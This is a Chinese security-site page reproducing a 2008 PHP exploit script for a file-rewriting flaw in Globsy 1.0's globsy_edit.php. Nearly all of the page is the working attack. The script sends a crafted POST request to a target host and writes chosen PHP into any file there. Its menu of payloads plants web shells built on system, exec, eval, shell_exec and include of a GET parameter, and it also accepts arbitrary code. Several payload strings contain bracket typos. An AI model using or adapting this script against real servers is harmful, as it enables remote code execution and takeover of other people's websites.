首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Globsy <= 1.0 Remote File Rewriting Exploit
来源:StAkeR[at]hotmail[dot]it 作者:StAkeR 发布时间:2008-10-20  

#!/usr/bin/php -q
<?php

/*
   ----------------------------------------------------------------------
   Globsy <= 1.0 Remote File Rewriting Exploit
   Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Discovered On 12/10/2008
   http://switch.dl.sourceforge.net/sourceforge/globsy/globsy_1.0.tar.gz
   ----------------------------------------------------------------------
  
   globsy_edit.php
  
37. elseif($mode == "save"){  
38. $handle = fopen($filename, "w") or die("Write: The file <i>'".$filename."'</i> could not be opened.");
39. fwrite($handle, $data) or die("Write: The file <i>'".$filename."'</i> could not be writen.");   
  
   $mode is $_POST['mode'] and $data = $_POST['data']
  
   so you can rewrite (or create) any file
   
*/


error_reporting(0);
ini_set("default_socket_timeout",5);

$host = str_replace('http:\/\/',null,$argv[1]);
$path = $argv[2]."/globsy_edit.php?file=";
$file = $argv[3];
$exec = intval($argv[4]);

if($exec == 8)
{
  $input = stripslashes(trim(fgets(STDIN)));
}
else
{
  $input = "Write your code\r\n";
}


$array = array(
               'include($_GET["input"]);',
               'exec($_GET["input");',
               'eval($_GET["input");',
               'file_get_contents($_GET["input"]);',
               'phpinfo();',
               'system($_GET["input");',
               'shell_exec($_GET["input");',
               'echo $_GET["input");',
                $input
              );

if($argc != 5)
{
  echo "[?] Globsy <= 1.0 Remote File Rewriting Exploit\r\n";
  echo "[?] Usage: php $argv[0] [host] [path] [file] [option]\r\n\r\n";
  echo "[?] Options: \r\n";
 
  for($i=0;$i<=count($array)-1;$i++)
  {
    echo "-$i $array[$i]\r\n";
  } 
    return exit;
}

if(!$sock = fsockopen($host,80)) die("[?] Socket Error\r\n");

$path .= $file;
$post .= "mode=save&data=<?php {$array[$exec]} ?>";
$data .= "POST /$path HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Accept-Encoding: text/plain\r\n";
$data .= "Content-Length: ".strlen($post)."\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $post;

if(!fputs($sock,$data)) die("[?] Fputs Error!\n");

while(!feof($sock))
{
  $content .= fgets($sock);
} fclose($sock);

if(!strpos('File data saved OK',$content))
{
  echo "[?] Exploit Successfully!\r\n";
  echo "[?] $array[$exec] written in $file\r\n";
}
else
{
  echo "[?] Exploit Failed!\r\n";
  exit;
}
 
 
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SlimCMS <= 1.0.0 (redirect.php
·LokiCMS <= 0.3.4 (index.php pa
·NoticeWare E-mail Server 5.1.2
·GuildFTPd 0.999.8.11/0.999.14
·MS08-066 AFD.sys Local Privile
·WinFTP 2.3.0 (PASV mode) Remot
·MS Windows GDI+ Proof of Conce
·Stash 1.0.3 (SQL) User Credent
·Kusaba <= 1.0.4 Remote Code Ex
·Yerba SACphp <= 6.3 / Local Fi
·Konqueror 3.5.9 (font color) M
·>Microsoft PicturePusher Activ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved